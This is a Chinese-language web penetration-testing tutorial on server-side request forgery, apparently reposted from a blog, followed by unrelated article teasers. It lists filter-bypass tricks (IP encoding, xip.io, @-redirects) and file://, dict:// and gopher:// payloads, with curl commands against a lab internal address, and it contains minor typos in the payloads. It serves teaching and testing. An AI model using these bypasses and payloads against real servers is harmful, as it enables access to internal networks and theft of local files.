web渗透—SSRF

时间：2024-08-07 15:52:12浏览次数：12

标签：web 01 04 SSRF 渗透 gopher 192.168 ssrf 0d%

一：SSRF介绍

是一种由web服务器发出请求的漏洞；它能够请求到与它相连的内网资源;通过外网服务器当作跳板请求内网资源！

二：SSRF常用函数

（1）file_get_contents函数

//可以读取本地文件；也可以通过url读取相关远程文件
<?php
	$data = file_get_contents('url');
	echo $ data;
?>

（2）curl函数

https://example.com/?url=baidu.com

三：SSRF绕过策略

1、限制思路

（1）限制对特定域名的访问请求

（2）禁止访问内网ip地址

2、绕过

（1）添加端口

（2）短链接

（3）192.168.11.1 <===> 192.168.11.1.xip.io

（4）数值绕过（进制转化）

（5）跳转绕过

http://[email protected]
//就会跳转到127.0.0.1

四：SSRF常用协议

(1)file协议

//file协议主要用于访问本地计算机文件
file://文件路径
file://c:\\flag.txt

(2)dict

//dict协议用于探测端口开放情况
dict://serverip:pore/info
dict://127.0.0.1:3306

(3)gohper(万能协议)

构造gopher数据包

空格改为%20;问号改为%3f;回车使用%0d%0a;最后一行+%0d%0a

gopher GET请求

(1)原始数据包

GET /ssrf/01/04/get.php?user=abc HTTP/1.1
Host: 192.168.0.104

(2)构造gopher GET请求包

GET%20/ssrf/01/04/get.php%3fuser=abc%20HTTP/1.1%0d%0aHost:%20192.168.0.104%0d%0a
//curl发起请求
curl gopher://192.168.0.104/_GET%20/ssrf/01/04/get.php%3fuser=abc%20HTTP/1.1%0d%0aHost:%20192.168.0.104%0d%0a

gopher POST请求

(1)原始数据包

POST /ssrf/01/04/post.php HTTP/1.1
Host: 192.168.0.104
Content-Type: application/x-www-urlenconded
Content-Length: 9

user=abcd

(2)构造gopher POST请求包

POST%20/ssrf/01/04/post.php%20HTTP/1.1%0d%0aHost:%0a192.168.0.104%0d%0aContent-Type:%20application/x-www-urlenconded%0d%0aContent-Length:%209%0d%0a%0d%0auser=abcd
//curl发起请求
gopher://192.168.0.104/_POST%20/ssrf/01/04/post.php%20HTTP/1.1%0d%0aHost:%0a192.168.0.104%0d%0aContent-Type:%20application/x-www-urlenconded%0d%0aContent-Length:%209%0d%0a%0d%0auser=abcd
//利用gohper协议就可以读取其中的信息！

标签：web,01,04,SSRF,渗透,gopher,192.168,ssrf,0d%
From： https://www.cnblogs.com/gsupl/p/18347161

图扑 HT for Web 轻松构建组态拓扑结构
在现代的数据可视化和网络管理中，拓扑图是一种非常重要的工具。它可以直观地展示节点(Node)和节点之间的关系(Edge)。无论是在2D还是3D环境中，拓扑图都可以帮助我们更好地理解和管理复杂的系统。然而，由于这些拓扑图通常极为复杂，传统的手动布局方式不仅繁琐且耗时。鉴于此，图......
通过go自定义alertmanager 发送通知的webhook
本文主要是大体介绍webhook的代码以及涉及到的服务部署，详细配置需要自己弄Prometheus、alertmanager部署先创建alertmanager、Prometheus的docker-composeyaml文件，下面只是把服务运行起来，具体功能需要自己配置，如果有就跳过version:'3'services:prometheus:ima......
UE Websocket 通信
项目中遇到UE需要对接Websocket协议接收实时数据。所以需要实现一个WebsocketClient的功能。由于UE引擎已经集成了Websocket库（基于libwebsocket），可以通过集成的WebSocket库来比较难容易实现WebSocketClient和Server进行通信。编程实现（C++）需要使用C++语言进行编程。下面是相......
基于javaweb的乡村旅游网站/旅游网站的设计与实现
摘要随着计算机技术，网络技术的迅猛发展，Internet的不断普及，网络在各个领域里发挥了越来越重要的作用。特别是随着近年人民生活水平不断提高，在线旅游给旅行社的业务带来了更大的发展机遇。在经济快速发展的带动下，旅游业的发展也是越来越快速。人们对旅游信息的获取需求很大......
基于javaweb jsp ssm网上书城系统的设计与实现+vue录像(源码+lw+部署文档+讲解等)
前言......
基于javaweb jsp ssm网上商城系统+vue录像(源码+lw+部署文档+讲解等)
前言......
基于javaweb jsp ssm网上拍卖系统的设计与实现+vue(源码+lw+部署文档+讲解等)
前言......
netcore webapi部署到docker容器，api调用后显示中文乱码
vs2022webapi部署到docker容器，api调用后显示中文乱码。原因是：源代码文件不是utf-8编码（用vscode打开是乱码，在vscode修改后，再提交，正常）解决方法一：在中文环境下用过微软家Visualstudio的都知道，新建文件的保存编码都默认为当前系统语言，所以你的文件编码永远都是GB2312，非常令人......
JavaWeb中的Tomcat,Servlet详解
JavaWebJavaWeb技术主要包括服务器技术(后端),如Tomcat,Servlet,JSP等待,以及客户端技术(前端)如HTML,CSS,JavaScript等等Web服务器Web服务器主要负责处理客户端发出的HTTP请求,并做出相应回应Web服务器:安装了服务器软件的计算机,只用于复杂处理请求,发出相应Web服务器......
（javaweb）Http协议
目录一.http概述二.Http-请求协议三.Http响应协议四.Http协议解析一.http概述---复制这个位置会自动前面有http浏览器给服务器发送请求携带请求数据，服务器解析数据，服务器前提需要知道具体格式等等--约定服务器处理完请求，需要给客户端一个响应。返回给客户端浏览器......

web渗透—SSRF

一：SSRF介绍

二：SSRF常用函数

三：SSRF绕过策略

四：SSRF常用协议

相关文章

赞助商

阅读排行